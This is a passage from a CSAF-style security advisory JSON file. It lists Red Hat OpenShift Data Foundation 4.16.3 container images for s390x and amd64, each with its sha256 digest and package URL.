"name": "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"product_id": "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"product_id": "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"product_id": "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"product_id": "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"product_id": "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"product": {
"name": "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"product_id": "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"product_id": "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"product": {
"name": "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"product_id": "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"product_id": "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"product": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"product_id": "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"product_id": "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"product_id": "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"product": {
"name": "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"product_id": "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"product": {
"name": "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"product_id": "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a?arch=s390x\u0026repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa?arch=s390x\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.16.3-1"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"product_id": "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5?arch=amd64\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"product_id": "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"product_id": "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"product_id": "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"product_id": "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"product_id": "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"product_id": "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"product_id": "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"product_id": "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"product": {
"name": "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"product_id": "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
